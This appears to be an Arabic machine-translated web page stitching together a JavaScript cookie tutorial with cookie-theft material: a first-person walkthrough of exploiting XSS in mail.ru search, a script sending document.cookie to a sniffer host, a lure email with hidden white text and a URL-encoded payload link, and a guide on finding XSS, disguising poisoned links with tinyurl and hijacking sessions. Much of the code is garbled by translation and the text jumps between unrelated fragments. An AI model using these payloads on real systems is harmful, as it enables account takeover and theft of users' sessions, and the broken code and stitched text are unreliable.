طرق سرقة ملفات تعريف الارتباط. كيفية استخراج كلمة المرور من ملف تعريف الارتباط ما الغرض منها؟

تتيح JavaScript إمكانية ضبط ملفات تعريف الارتباط وقراءتها في المتصفح. سنلقي نظرة في هذا الدرس على كيفية التعامل مع ملفات تعريف الارتباط، وسنقوم أيضًا بإنشاء صفحة بسيطة تتذكر الاسم الذي تم إدخاله وتعرضه في كل مرة تقوم فيها بتسجيل الدخول.

ما هي ملفات تعريف الارتباط؟

ملفات تعريف الارتباط هي كمية صغيرة من البيانات التي يتم تخزينها بواسطة متصفح الويب. إنها تسمح لك بتخزين معلومات معينة عن المستخدم واسترجاعها في كل مرة يزور فيها صفحتك. كل مستخدم لديه مجموعة فريدة خاصة به من ملفات تعريف الارتباط.

عادةً ما يستخدم خادم الويب ملفات تعريف الارتباط لأداء وظائف مثل تتبع زيارات الموقع والتسجيل على الموقع وتخزين المعلومات حول الطلبات أو المشتريات. ومع ذلك، لا نحتاج إلى اختراع برنامج خادم ويب لاستخدام ملفات تعريف الارتباط. يمكننا استخدامها باستخدام جافا سكريبت.

الخاصية document.cookie.

في JavaScript، يتم الوصول إلى ملفات تعريف الارتباط باستخدام خاصية ملف تعريف الارتباط لكائن المستند. يمكنك إنشاء ملفات تعريف الارتباط على النحو التالي:

واحصل على المجموعة الكاملة من ملفات تعريف الارتباط المحفوظة مثل هذا:

var x = document.cookie;

دعونا نلقي نظرة على حفظ ملفات تعريف الارتباط واسترجاعها بمزيد من التفاصيل.

حفظ ملفات تعريف الارتباط

لحفظ ملف تعريف الارتباط، نحتاج إلى تعيين document.cookie لسلسلة نصية تحتوي على خصائص ملف تعريف الارتباط الذي نريد إنشاءه:

document.cookie = "الاسم = القيمة؛ انتهاء الصلاحية = التاريخ؛ المسار = المسار؛ المجال = المجال؛ آمن"؛

الخصائص موضحة في الجدول:

مثال لوصف العقار

الاسم = القيمة	يضبط اسم ملف تعريف الارتباط وقيمته.	اسم المستخدم=فاسيا
تنتهي = تاريخ	يضبط تاريخ انتهاء صلاحية ملفات تعريف الارتباط. يجب أن يكون التاريخ بالتنسيق الذي يتم إرجاعه بواسطة الأسلوب toGMTString() الخاص بكائن التاريخ. إذا لم يتم تحديد انتهاء الصلاحية، فسيتم حذف ملف تعريف الارتباط عند إغلاق المتصفح.	تنتهي = 13/06/2003 00:00:00
المسار= المسار	يقوم هذا الخيار بتعيين المسار على الموقع الذي يكون ملف تعريف الارتباط صالحًا فيه. يمكن للمستندات الموجودة في المسار المحدد فقط استرداد قيمة ملف تعريف الارتباط. عادةً ما يتم ترك هذه الخاصية فارغة، مما يعني أنه فقط المستند الذي قام بتعيين ملف تعريف الارتباط يمكنه الوصول إليها.	المسار=/تجريبي/
المجال = المجال	يقوم هذا الخيار بتعيين المجال الذي يعمل فيه ملف تعريف الارتباط. يمكن فقط للمواقع من المجال المحدد تلقي قيمة ملف تعريف الارتباط. عادةً ما يتم ترك هذه الخاصية فارغة، مما يعني أنه فقط المجال الذي قام بتعيين ملف تعريف الارتباط يمكنه الوصول إليها.	المجال=موقع الويب
يؤمن	يخبر هذا الخيار المتصفح باستخدام SSL لإرسال ملفات تعريف الارتباط إلى الخادم. نادرا جدا ما تستخدم.	يؤمن

دعونا نرى مثالاً لإعداد ملفات تعريف الارتباط:

document.cookie = "اسم المستخدم=فاسيا؛ انتهاء الصلاحية=02/15/2011 00:00:00";

يقوم هذا الرمز بتعيين ملف تعريف الارتباط لاسم المستخدم ويعين له القيمة "Vasya"، والتي سيتم تخزينها حتى 15 فبراير 2011 (يتم استخدام تنسيق التوقيت الأوروبي!).

var cookie_date = new Date(2003, 01, 15); document.cookie = "اسم المستخدم=Vasya; انتهاء الصلاحية =" + cookie_date.toGMTString();

يقوم هذا الكود بنفس الشيء تمامًا كما في المثال السابق، ولكنه يستخدم الأسلوب Date.toGMTString() لتعيين التاريخ. يرجى ملاحظة أن ترقيم الشهر في كائن التاريخ يبدأ من 0، أي أن فبراير هو 01.

Document.cookie = "logged_in=yes";

يقوم هذا الرمز بتعيين ملف تعريف الارتباط logged_in ويضبطه على "نعم". نظرًا لعدم تعيين سمة انتهاء الصلاحية، سيتم حذف ملف تعريف الارتباط عند إغلاق المتصفح.

var cookie_date = new Date(); // التاريخ والوقت الحالي cookie_date.setTime (cookie_date.getTime() - 1); document.cookie = "logged_in=; تنتهي صلاحيته =" + cookie_date.toGMTString();

يقوم هذا الرمز بتعيين ملف تعريف الارتباط logged_in وتعيين سلسلة التخزين على الوقت قبل الوقت الحالي بثانية واحدة - ستؤدي هذه العملية إلى حذف ملف تعريف الارتباط على الفور. طريقة يدوية لحذف ملفات تعريف الارتباط!

إعادة ترميز قيمة ملف تعريف الارتباط!

يجب إعادة ترميز قيمة ملف تعريف الارتباط لتخزين الأحرف وعرضها بشكل صحيح مثل المسافة والنقطتين. تضمن هذه العملية أن يفسر المتصفح القيمة بشكل صحيح. يتم تنفيذ إعادة ترميز Lego بواسطة وظيفة JavaScript escape(). على سبيل المثال:

document.cookie = "username=" + escape("Vasya Pupkin") + "; تنتهي = 02/15/2003 00:00:00"; وظيفة لإعداد ملفات تعريف الارتباط

سيكون إعداد ملفات تعريف الارتباط أسهل إذا كتبنا وظيفة خاصة تؤدي عمليات بسيطة مثل إعادة ترميز القيم وإنشاء سلسلة document.cookie. على سبيل المثال:

الدالة set_cookie (الاسم، القيمة، exp_y، exp_m، exp_d، المسار، المجال، الآمن) ( var cookie_string = name + "=" + escape (value); if (exp_y) ( varنتهي = تاريخ جديد (exp_y, exp_m, exp_d ); (المجال)؛ إذا (آمن) cookie_string += "؛ آمن"؛ document.cookie = cookie_string )

تأخذ الوظيفة بيانات ملف تعريف الارتباط كوسائط، ثم تقوم بإنشاء السلسلة المناسبة وتعيين ملف تعريف الارتباط.

على سبيل المثال، تعيين ملفات تعريف الارتباط بدون تاريخ انتهاء الصلاحية:

set_cookie("username", "Vasya Pupkin"); set_cookie ("اسم المستخدم"، "Vasya Pupkin"، 2011، 01، 15)؛

تعيين ملفات تعريف الارتباط مع فترة تخزين، ومجال الموقع، باستخدام SSL، ولكن بدون مسار:

set_cookie ("اسم المستخدم"، "Vasya Pupkin"، 2003، 01، 15، ""، "الموقع"، "آمن")؛ وظيفة حذف ملفات تعريف الارتباط.

يتم عرض وظيفة أخرى مفيدة للعمل مع ملفات تعريف الارتباط أدناه. تقوم الوظيفة "بحذف" ملفات تعريف الارتباط من المتصفح عن طريق تعيين تاريخ انتهاء الصلاحية على ثانية واحدة قبل قيمة الوقت الحالية.

وظيفة حذف ملف تعريف الارتباط (اسم ملف تعريف الارتباط) ( فار ملف تعريف الارتباط = تاريخ جديد ()؛ // التاريخ والوقت الحالي cookie_date.setTime (ملف تعريف الارتباط_تاريخ.getTime() - 1)؛ document.cookie = cookie_name += "=؛ انتهاء الصلاحية = " + cookie_date.toGMTString ()؛

لاستخدام هذه الوظيفة، ما عليك سوى تمرير اسم ملف تعريف الارتباط المراد حذفه:

حذف_ملف تعريف الارتباط("اسم المستخدم");

الحصول على قيمة ملف تعريف الارتباط

للحصول على قيمة ملف تعريف الارتباط المُعد مسبقًا للمستند الحالي، تحتاج إلى استخدام خاصية document.cookie :

var x = document.cookie;

يؤدي هذا إلى إرجاع سلسلة تتكون من قائمة بأزواج الاسم/القيمة مفصولة بفواصل منقوطة الجميعملفات تعريف الارتباط الصالحة للمستند الحالي. على سبيل المثال:

"اسم المستخدم=فاسيا؛ كلمة المرور=abc123"

في هذا المثال، هناك نوعان من ملفات تعريف الارتباط تم تعيينهما مسبقًا: اسم المستخدم، الذي له القيمة "Vasya"، وكلمة المرور، التي لها القيمة "abc123".

وظيفة للحصول على قيمة ملف تعريف الارتباط

عادةً، نحتاج فقط إلى قيمة ملف تعريف ارتباط واحد في كل مرة. ولذلك، فإن سلسلة ملفات تعريف الارتباط ليست مناسبة للاستخدام! إليك دالة تعالج السلسلة document.cookies، وتعيد فقط ملفات تعريف الارتباط ذات الأهمية في لحظة معينة:

الدالة get_cookie (اسم ملف تعريف الارتباط) ( var results = document.cookie.match ("(^|;) ؟" + cookie_name + "=([^;]*)(;|$)"); if (results) return (unescape (النتائج))؛ وإلا سترجع فارغة)

تستخدم هذه الوظيفة تعبيرًا عاديًا للعثور على اسم ملف تعريف الارتباط محل الاهتمام، ثم تقوم بإرجاع القيمة التي تتم معالجتها بواسطة وظيفة unescape() لإعادة تشفيرها إلى شكل أحرف عادي. (إذا لم يتم العثور على ملف تعريف الارتباط، فسيتم إرجاع القيمة null.)

هذه الميزة سهلة الاستخدام. على سبيل المثال، لإرجاع قيمة ملف تعريف ارتباط اسم المستخدم:

var x = get_cookie("اسم المستخدم");

مثال استخدام بسيط

في هذا المثال، قمنا بإنشاء صفحة تطلب اسمك عند زيارتك الأولى، ثم تقوم بحفظ اسمك في ملف تعريف الارتباط وعرضه في الزيارات اللاحقة.

افتح الصفحة في نافذة جديدة. في زيارتك الأولى، سيطلب منك إدخال اسمك وحفظه في ملف تعريف الارتباط. إذا قمت بزيارة الصفحة مرة أخرى، فستعرض اسم ملف تعريف الارتباط الذي أدخلته على الشاشة.

بالنسبة لملفات تعريف الارتباط، قمنا بتعيين فترة الاحتفاظ بسنة واحدة من التاريخ الحالي، وهذا يعني أن المتصفح سيحفظ اسمك حتى لو قمت بإغلاقه.

يمكنك عرض رمز الصفحة في متصفحك عن طريق تحديد خيار عرض المصدر. إليك الجزء الرئيسي من الكود:

إذا (! get_cookie ("اسم المستخدم")) ( فار اسم المستخدم = موجه ("الرجاء إدخال اسمك"، "")؛ إذا (اسم المستخدم) ( فار current_date = تاريخ جديد؛ فار cookie_year = current_date.getFullYear () + 1؛ فار cookie_month = current_date.getMonth(); var cookie_day = current_date.getDate() set_cookie("username", username, cookie_year, cookie_month, cookie_day)) ) else( var username = get_cookie("username"); document.write ("مرحبا"). ، " + اسم المستخدم + "، مرحبًا بك في الصفحة!")؛ document.write("
إنساني!"); }

يوضح لك هذا الدرس كيفية استخدام ملفات تعريف الارتباط في JavaScript لتخزين معلومات حول زوار موقعك. شكرًا لكم على اهتمامكم! :)

حيث تم اقتراح حضور حدث مجاني مخصص لقضايا أمن المعلومات. منذ أن أقيم الحدث في مدينتي، قررت أنني بالتأكيد بحاجة للذهاب إلى هناك. تم تخصيص الدرس الأول لنقاط الضعف في مواقع الويب مثل XSS. بعد الدرس، قررت أنني بحاجة إلى تعزيز المعرفة المكتسبة في ظروف حقيقية. اخترت العديد من المواقع التي تتعلق بمدينتي وبدأت في محاولة إدراج البرنامج النصي الخاص بي في جميع النماذج. في معظم الحالات، تم تصفية البرنامج النصي. ولكن حدث أن تم إطلاق "التنبيه" وظهرت رسالتي. لقد أبلغت المسؤولين عن الثغرة الأمنية، وسرعان ما قاموا بإصلاح كل شيء.

في أحد هذه الأيام، أثناء التحقق من أحدث البريد على mail.ru، لفت انتباهي نموذج البحث عن الحروف في صندوق البريد. أحيانًا كنت أستخدم هذا البحث للعثور على شيء أحتاجه في كومة من رسائلي القديمة. حسنًا، بما أنني قمت في اليومين الماضيين بإدخال "التنبيه" الخاص بي في كل مكان تقريبًا، فقد وصلت يدي بشكل تلقائي إلى نموذج البحث هذا. لقد كتبت الرمز الخاص بالبرنامج النصي الخاص بي ثم ضغطت على Enter. تخيل دهشتي عندما رأيت رسالة مألوفة مؤلمة على الشاشة...

في محاضرة Open InfoSec Days، قال المتحدث إن المبرمجين متشككون تمامًا بشأن نقاط الضعف من هذا النوع، قائلًا "تنبيه؟ حسنا، ماذا في ذلك؟ هذا ليس خطيرا". إذا كنت راضيًا في مواقع أخرى عن هذه النافذة التي تحتوي على رسالتي فقط، ففي هذه الحالة قررت المضي قدمًا وإظهار ما يمكن أن يخرج من مثل هذا "التنبيه".

لذا، يعمل البرنامج النصي، مما يعني أن هناك ثغرة أمنية. ولذلك، يمكنك محاولة تشغيل بعض البرامج النصية الأخرى. على سبيل المثال، برنامج نصي يرسل إلينا ملفات تعريف الارتباط الخاصة بمستخدم آخر. لكي يعمل البرنامج النصي، نحتاج إلى إجبار المستخدم على تنفيذ البرنامج النصي الخاص بنا. يمكن القيام بذلك عن طريق إرسال خطاب إليه بالرابط المناسب، وبعد النقر عليه سيتم البحث في صندوق البريد وتنفيذ الرمز الذي نحتاجه.

لقد استغرق الأمر بعض الوقت والكثير من التجارب لفهم آليات الثغرة الأمنية. في بعض الأحيان كان البرنامج النصي يعمل، وفي أحيان أخرى تمت تصفيته. بعد بعض الجهد، تم تحديد تجريبيا أن البرنامج النصي يعمل بنسبة 100٪ فقط إذا كان البحث عن الحروف يعطي نتيجة إيجابية. أي أنه عندما يقوم المستخدم بإجراء بحث باستخدام البرنامج النصي الخاص بنا، فمن الضروري العثور على حرف واحد على الأقل في صندوق البريد الخاص به وفقًا للمعايير المحددة. ليس من الصعب ترتيب هذا.

وأيضًا، بدلاً من "التنبيه"، نحتاج إلى برنامج نصي ينقل ملفات تعريف الارتباط إلى جهاز الشم الخاص بنا. سنكتب هذا البرنامج النصي في ملف منفصل ونقوم بتحميله في بحثنا. لقد قمت بإنشاء ملف test.js بالرمز اللازم وقمت بتحميله إلى الاستضافة. رمز البرنامج النصي هو مثل هذا:

Img=new Image();
img.src="http://sitename.ru/sniff.php?cookie="+document.cookie;
الدالة F() (
الموقع = "http://www.solife.ru"؛
}
setTimeout(F, 5000);

ما أود توضيحه هنا. فلنضع أنفسنا مكان المهاجم. نحن بحاجة إلى المستخدم للنقر على الرابط. كيف يمكنني إجباره على القيام بذلك؟ يمكنك أن تعد بجبال من الذهب، وللحصول عليها عليك اتباع الرابط الخاص بنا إلى الموقع. لكنني لا أعتقد أنها ستنجح. لم يعد الناس يقعون في هذا الفخ (أنا بنفسي أحذف هذه الرسائل باستمرار دون قراءتها). لذلك سنلعب على الشفقة الإنسانية فهي لا تزال موجودة في الطبيعة. نطلب منكم التصويت في الموقع لإنقاذ الحيوانات المهددة بالانقراض. أولاً، سنأخذ ملفات تعريف الارتباط، ثم سنعيد توجيه المستخدم إلى موقع التصويت. تم ضبط مهلة إعادة التوجيه على 5 ثوانٍ، وإلا لم يكن لدى ملفات تعريف الارتباط الوقت الكافي للانتقال إلى جهاز الشم، وتمت إعادة توجيه المستخدم على الفور إلى موقع خاص بالحيوانات. بدلاً من "التنبيه" استخدمت النص التالي:

عندما انتهيت من النصوص، بدأت في كتابة الرسالة. لقد توصلت إلى شيء مثل هذا:


لقد اتضح الأمر بسخرية تامة، لكنني حاولت تقريب الظروف من الواقع قدر الإمكان. يوجد في نهاية الرسالة سطر به نص، وذلك حتى يتم العثور على رسالتنا عندما نقوم بالبحث. وحتى لا يثير الخط أسئلة غير ضرورية، قمت برسمه باللون الأبيض. كما قمت بوضع مسافة في كلمة "http" حتى لا يتم التعرف على السلسلة وتحويلها إلى رابط. بخلاف ذلك، على الرغم من أن سطر النص مكتوب بخط أبيض، فسيتم تمييز الرابط باللون الأزرق من قبل المستلم، ولسنا بحاجة إلى ذلك. سيستمر البحث الذكي في العثور على هذه السلسلة والتعرف عليها، بغض النظر عن المسافات.

E.mail.ru/cgi-bin/gosearch?q_folder=0&q_query=%27%3E%3Cscript%20src%3D%27http%3A%2F%2Fsitename.ru%2Ftest.js%27%3E%3C%2Fscript%3E

لقد استخدمت ترميز URL للبرنامج النصي حتى لا يتم تصفية أي شيء. أضفت أيضًا المعلمة "q_folder=0" للبحث، بحيث يتم البحث في مجلد "Inbox".

الرسالة جاهزة، نرسلها. لقد استخدمت صندوق البريد الثاني الخاص بي على نفس الخدمة التي يستخدمها المستلم. دعونا نرى ما وصل إلى المربع الآخر.

نص البرنامج النصي الخاص بنا غير مرئي لأنه يمتزج مع الخلفية. دعونا نضغط على الرابط ونرى ما سيحدث. يتم نقل المستخدم إلى نتائج البحث لرسائل البريد الإلكتروني بناءً على المعلمة التي حددناها. رسالتنا التي أرسلناها مرئية في نتائج البحث. في هذا الوقت، كان البرنامج النصي الخاص بنا يعمل بالفعل وأرسل ملفات تعريف الارتباط الخاصة بالمستخدم إلى أداة الشم. بعد 5 ثواني (يعتمد الوقت على إعدادات البرنامج النصي)، تتم إعادة توجيه المستخدم إلى موقع التصويت.

أتحقق من ملف sniff.txt الخاص بي:

وبما أن هدفي ليس سرقة صناديق الآخرين أو الوصول إليها، فسوف أنهي القصة هنا. ولكن من الناحية النظرية، يمكنك استبدال ملفات تعريف الارتباط الخاصة بك بملفات تعريف الارتباط الخاصة بشخص آخر والوصول إلى صندوق بريد شخص آخر. بشكل عام، إذا كان المهاجم مهتمًا بهدف ما، فسوف يجد استخدامًا للمعلومات التي يتلقاها.

أود أن أشكر سيرجي بيلوف (

صديق لي نسي كلمة المرور لأحد المواقع. ومع ذلك، فقد قام سابقًا بوضع علامة على مربع الاختيار "تذكرني" في متصفح Google Chrome عند تسجيل الدخول، مما سمح له بالدخول إلى الموقع ضمن حسابه. تلقيت سؤالاً عما إذا كان من الممكن نقل هذه الحالة السحرية إلى كمبيوتر آخر. كان من الأصح بالطبع تغيير كلمة المرور أو استعادتها، لكن صديقي لم يستطع القيام بذلك لأسباب لا علاقة لها بالقضية.

كيفية استخدام Interter-ng للدمى

على الرغم من تنوع البرامج الحديثة للاختيار من بينها، فمن الصعب العثور على برامج اختراق أفضل لنظام Android من Intercepter ng. المعيار الأول الذي يشير لصالح هذا المنتج هو أدائه الفعلي. معظم أدوات الاستنشاق المتوفرة على الشبكة هي مجرد تقليد لا يؤدي وظائفه المعلنة.

العوامل الإيجابية التالية هي تنوع التطبيق وتغطية جمهور واسع من المستخدمين.

مساعدة الكمبيوتر 939-29-71

لنبدأ بالترتيب. ملفات تعريف الارتباط أو "ملفات تعريف الارتباط" هي ملفات نصية صغيرة جدًا - إشارات مرجعية تحتوي على معلومات.

ينقل خادم الويب هذه المعلومات إلى متصفح المستخدم. حيث يتم تخزين هذه المعلومات لحين الحاجة إليها. ليس واضحا تماما. حسنًا. بخير.

سأحاول أن أجعل الأمر أكثر بساطة. ينظر. لقد قمت بالتسجيل في أي موقع.

وفي وقت التسجيل، يتم إنشاء "ملفات تعريف الارتباط" نفسها.

هذا ما هم عليه.

كوكي كادجر

يستمع البرنامج إلى حركة المرور على شبكة WiFi، ويعترض ملفات تعريف الارتباط ويكرر جلسة المستخدم في متصفحك، ويكرر الطلبات ببيانات اعتماده. قدم المؤلف ماثيو سوليفان عرضًا تقديميًا للبرنامج في 30 سبتمبر في مؤتمر Derbycon للهاكر. أثناء الخطاب مباشرة، اعترض ماثيو سوليفان جلسة غير آمنة مع Google لأحد زوار المؤتمر عبر شبكة WiFi.

كيفية سرقة ملفات تعريف الارتباط

إذا قمت، أثناء وجودك على صفحة موقع ويب، بإدخال النص التالي في شريط العناوين بمتصفح Firefox أو Opera الخاص بك: javaсript:document.write(document.cookie); ثم سترى شيئًا مثل: remixAdminsBar=0; remixGroupType=0; ريمكسباس=******************; remixwall=0; remixInformation=0; remixMembersBar=0; remixdescription=0; remixautobookmark=8; ريمكسيميل=*******; ريمكسميد=23363; ريمكسشك=5; remixaudios=0; remixlinksBar=1; remixOfficersBar=0; remixPhotosBar=0; remixTopicsBar=0; ريمكسفيديوس=0; remixRecentNews=0; remixAlbumsBar=0 انتبه! .

الدليل الكامل للبرمجة النصية عبر المواقع

XSS هو نوع من الثغرات البرمجية الموجودة في تطبيقات الويب والتي تسمح للمهاجم بإدخال برنامج نصي من جانب العميل في صفحات الويب التي يشاهدها مستخدمون آخرون. وتعرف ويكيبيديا XSS على النحو التالي: "البرمجة النصية عبر المواقع (XSS) هي نوع من ثغرات البرامج الأصلية. إلى الويب - التطبيقات (عن طريق تجاوز قيود أمان المتصفح)"، والتي تسمح للمهاجم بإدخال البرنامج النصي للعميل في صفحات الويب التي يشاهدها المستخدمون الآخرون.

الفرق بين ملفات تعريف الارتباط والجلسات

منذ وقت ليس ببعيد كتبت مقالًا حول كيفية تسجيل المستخدمين وتفويضهم على موقع ويب.

". سأقوم في هذه المقالة بتوضيح الفرق بين الجلسات وملفات تعريف الارتباط. حتى تتمكن أخيرًا من تحديد اختيارك.

بسكويت. لا، الأمر لا يتعلق بملفات تعريف الارتباط على الإطلاق، بل يتعلق بسلامتك. لذلك تذهب إلى موقع الويب المفضل لديك "vkontakte" (أو، على سبيل المثال، انظر البريد) على جهاز كمبيوتر شخص آخر، وترفض خيار "حفظ كلمة المرور"، وتبحث بسعادة في البريد وتغادر. ولا تفكر في أنه يمكنك الآن تسجيل الدخول إلى شبكة اجتماعية أو بريد إلكتروني باسمك.

أنا لا أفكر حتى في الموقف مع برنامج يتذكر كلمة المرور دون علمك. يعد هذا بالفعل اختراقًا متعمدًا، ومن المحتمل أن تشك في أن شيئًا كهذا قد يحدث ولن تذهب إلى موقعك المفضل على مثل هذا الكمبيوتر. لكن يمكننا التحدث عن فضول إنساني بسيط - كنت تزور أصدقاء، ثم مرة أخرى، وتتاح لهم الفرصة لقراءة بريدك. هل أنت متأكد من أنهم سيرفضون هذه الفرصة؟ ألا تخشى أن يخرج شيء ما؟ على أي حال، سأضع الأسئلة الأخلاقية جانبًا وأتحدث فقط عن كيفية تخزين المعلومات على الكمبيوتر والتي يمكن الآن السماح لك بدخولها إلى بعض المواقع دون طلب كلمة مرور.

كيفية سرقة كوكي

واسم هذه التقنية هو ملفات تعريف الارتباط.

وهذا هو المكان الذي بدأ فيه كل شيء. لم يوفر بروتوكول http، الذي يمكنك من خلاله عرض المواقع فعليًا (بما في ذلك هذا الموقع)، في البداية إمكانية الحفاظ على الاتصال. وهذا يعني، تقريبًا، أنك ترسل طلبًا إلى الموقع، وتتلقى استجابة، ويتم عرضه على الشاشة، ومن ثم لا يتذكر الخادم أي شيء عنك. وهذا بالطبع أمر جيد عندما يكون الموقع إعلاميًا بحتًا ويجب ألا يتذكر أي شيء عنك، لكننا نعيش في عصر الويب 2.0 😉 التطور الطبيعي للبروتوكول هو طلبات POST وGET، عندما ترسل بعض البيانات، يمكن للخادم كتابتها على بيانات قاعدة البيانات، ولكن هذا لا يكفي.

دعونا نلقي نظرة على مثال بسيط للغاية. المنتدى. لقد قمت بالتسجيل، وهناك منشور في المنتدى يفيد بوجود مستخدم كذا وكذا بكلمة مرور كذا وكذا وبعض البيانات الإضافية الأخرى. ولكن الآن تذهب إلى المنتدى وتسجيل الدخول - أدخل كلمة المرور الخاصة بك. في مكان ما يجب أن تكون هناك معلومات قمت بتسجيل الدخول إليها. على الخادم؟ بالطبع لا! من المستحيل تخزين المعلومات على الخادم التي تم فيها التفويض من جهاز الكمبيوتر الخاص بك - فلن يتمكن من تمييزك عن شخص آخر (حتى عنوان IP الخاص بك لا يحدد هويتك بشكل فريد)! ومن ثم، يجب تخزين المعلومات التي حدثت بشأن التفويض على جهاز الكمبيوتر الخاص بك. هذا هو الغرض من ملفات تعريف الارتباط، ولهذا تم إنشاؤها من أجله.

ملف تعريف الارتباط هو سجل صغير على جهاز الكمبيوتر الخاص بك يقوم بتخزين معلومات حول الموقع الذي قمت بزيارته. عند تسجيل الدخول، يتم إنشاء إدخال مماثل، وبعد ذلك يمكنك التجول في المنتدى، وسوف يتعرف عليك. ومع ذلك، سيحدث هذا تلقائيًا - بفضل المعلومات المخزنة في ملف تعريف الارتباط - لذا فإن التظاهر بأنك المسؤول الرئيسي للمنتدى لن ينجح في تجاوز التحقق من كلمة المرور.

والآن يمكننا العودة إلى حيث بدأ هذا المقال. إذا قمت بتسجيل الدخول في مكان ما دون حفظ كلمة المرور، فقد يحدث أنه تم إنشاء إدخال على الكمبيوتر يسمح لك الآن بتسجيل الدخول إلى هذا المورد باسمك دون إذن. سيصبح هذا الإدخال نفسه قديما بعد مرور بعض الوقت، ولكن يمكنك إجباره على التطهير. يقوم كل متصفح بذلك بشكل مختلف، وسأوضح لك كيف يمكن القيام بذلك في Google Chrome المفضل لدي. فتح المعلمات

انتقل إلى علامة التبويب "متقدمة" وابحث عن زر "إظهار ملفات تعريف الارتباط".

الآن، بالطبع، يمكنك حذف كافة ملفات تعريف الارتباط، ولكن هذا قد يزعج مالك الكمبيوتر. لذلك، على سبيل المثال، في الحقل العلوي يمكنك إدخال اسم الموقع الذي تهتم به

وبعد ذلك يمكنك فقط مسح ملفات تعريف الارتباط المتعلقة بهذا الموقع. يمكنك تجربتها على حسابي. ومع ذلك، إذا قمت بتسجيل الدخول إلى منتداي ثم مسحت ملفات تعريف الارتباط الخاصة بك، فسيتم نسيان معلومات تسجيل الدخول. جربها!

تعليقات مدعومة من

1.ما هو XSS؟
تسمح ثغرة XSS بإدراج كود جافا سكريبت العشوائي في نص الصفحة. يختلف هجوم XSS عن الآخرين (على سبيل المثال، حقن SQL أو حقن PHP) من حيث أنه يؤثر على العميل، وليس الخادم.

كيفية سرقة ملفات تعريف الارتباط

بمساعدتها، لا يمكنك عرض جداول قاعدة البيانات، أو تحميل الصدفة، وما إلى ذلك. الاستخدام الأكثر شيوعًا لـ XSS هو سرقة ملفات تعريف الارتباط.
ملفات تعريف الارتباط هي جزء صغير من البيانات التي يتم إنشاؤها بواسطة خادم الويب ويتم تخزينها على جهاز الكمبيوتر الخاص بالمستخدم كملف. عادةً، يتم استخدام ملفات تعريف الارتباط لتخزين الحسابات، وفي أغلب الأحيان، تحتوي على كلمة مرور مشفرة وتسجيل الدخول ومعرف الجلسة (على الرغم من أن ذلك ليس دائمًا)
يأتي XSS في نوعين، نشط وسلبي.

يتطلب Passive XSS مشاركة مباشرة من الضحية، مثل النقر على رابط يحتوي على كود جافا سكريبت. عند استخدام هذا النوع من XSS، لا يمكنك الاستغناء عن SI (الهندسة الاجتماعية)

لا يتطلب Active XSS أي مشاركة من الضحية؛ كل ما عليهم فعله هو زيارة الصفحة التي تحتوي على XSS. يمكن أن يكون XSS النشط، على سبيل المثال، في الرسائل في المنتديات والمحادثات وإضافة الأخبار وما إلى ذلك.

2. ابحث عن XSS
سأخبرك في هذه الفقرة بكيفية العثور على XSS

2.1.XSS السلبي
للعثور على XSS السلبي، ما عليك سوى استبدال التنبيه ('xss') في نموذج الإدخال، إذا كان البرنامج النصي يعمل وظهرت الرسالة "xss"، فهذا يعني أن الثغرة الأمنية موجودة، وإذا لم يعمل البرنامج النصي، يمكنك أيضًا تجربة ">alert ()، ربما تكون هذه هي ثغرة xss الأكثر شيوعًا. إذا لم يعمل أي منهما أو البرنامج النصي الآخر، فمن المرجح أنه لا توجد ثغرة أمنية.
لنلقي نظرة على مثال.
http://miss.rambler.ru/srch/?sort=0& … amp;words=
هل ترى نموذج "البحث"؟ أدخل ">alert()" هناك وانقر على "بحث"
تظهر نافذة تحتوي على xss، مما يعني وجود xss (ربما بحلول الوقت الذي تقرأ فيه هذه المقالة، يكون هذا xss قد تمت إزالته بالفعل).

2.2.XSS النشط
يمكن أن يكون مثل هذا CSS، على سبيل المثال، في حقول الملف الشخصي، عند إضافة أخبار في عنوان الأخبار وفي الأخبار نفسها (في كثير من الأحيان)، في الرسائل في المنتديات/غرف الدردشة/غرف الضيوف مع تمكين HTML. كل شيء بسيط هنا، نقوم بإدخال البرنامج النصي من الفقرة الفرعية السابقة في الحقول، وإذا تم عرض الرسالة على الشاشة، فإن الثغرة الأمنية موجودة.
دعونا نلقي نظرة على علامات xss في BB في المنتديات.
يمكنك محاولة إدراج كود جافا سكريبت ببساطة في العلامة، على سبيل المثال مثل هذا:
جافا سكريبت: تنبيه ('xss')
تحتوي بعض العلامات على معلمات، على سبيل المثال، تحتوي العلامة على معلمات dynsrc وlowsrc، فلنحاول استبدال الكود على النحو التالي:
http://www.site.ru/image.jpg dynsrc=javascript:alert('xss')
إذا نجح البرنامج النصي، فإن XSS موجود

3.استخدام XSS لسرقة ملفات تعريف الارتباط
الآن الأكثر لذيذ))))
من أجل سرقة ملفات تعريف الارتباط، نحتاج إلى أداة تشمّم الويب، ويمكنك تثبيت نوع من أداة الشم على استضافتك، أو يمكنك استخدام أداة الشم على الإنترنت، والتي يوجد منها الكثير الآن.
لسرقة ملفات تعريف الارتباط عبر XSS السلبي، يجب على الضحية اتباع رابط سام. لسرقة ملفات تعريف الارتباط، سنستخدم برنامجًا نصيًا آخر بدلاً من التنبيه ('xss'):
img = صورة جديدة();


نقوم باستبدال البرنامج النصي في الرابط ونسمح للضحية بمتابعته وإلقاء نظرة على سجل الشم ونبتهج.
لنلقي نظرة على مثال.
لنأخذ XSS على Rambler من الفقرة السابقة.
نحن ندخل
">
img = صورة جديدة();
img.src = "عنوان الصورة المكتشف"+document.cookie;

في نموذج البحث، انقر فوق "بحث"، وانظر إلى شريط العناوين وانظر:

http://miss.rambler.ru/srch/?sort=0& … &words =">
نرسل هذا الرابط إلى الضحية ونستمتع بملفات تعريف الارتباط.
عند رؤية مثل هذا الارتباط، قد يشك الضحية في شيء ما، لذا يُنصح بالتشفير
">img = new Image();img.src = "عنوان الصورة المكتشف"+document.cookie;
في عنوان URL أو استخدم خدمات مثل http://tinyurl.com/
دعنا ننتقل إلى XSS النشط، كل شيء بسيط هنا، بدلاً من التنبيه () نقوم بإدخال img = new Image();img.src = "عنوان الصورة المتشمم"+document.cookie;

الآن لدينا ملفات تعريف الارتباط. ولكن ماذا تفعل معهم؟ الأمر بسيط، تحتاج إلى استبدالها بدلاً من تلك الخاصة بك. يحتوي متصفح Opera على محرر ملفات تعريف الارتباط مدمج (أدوات->متقدم->إدارة ملفات تعريف الارتباط)، وهناك مكون إضافي لمتصفح Firefox (لا أتذكر اسمه، استخدم Google)
هذا كل شيء الآن، ربما سيتم استكمال المقال

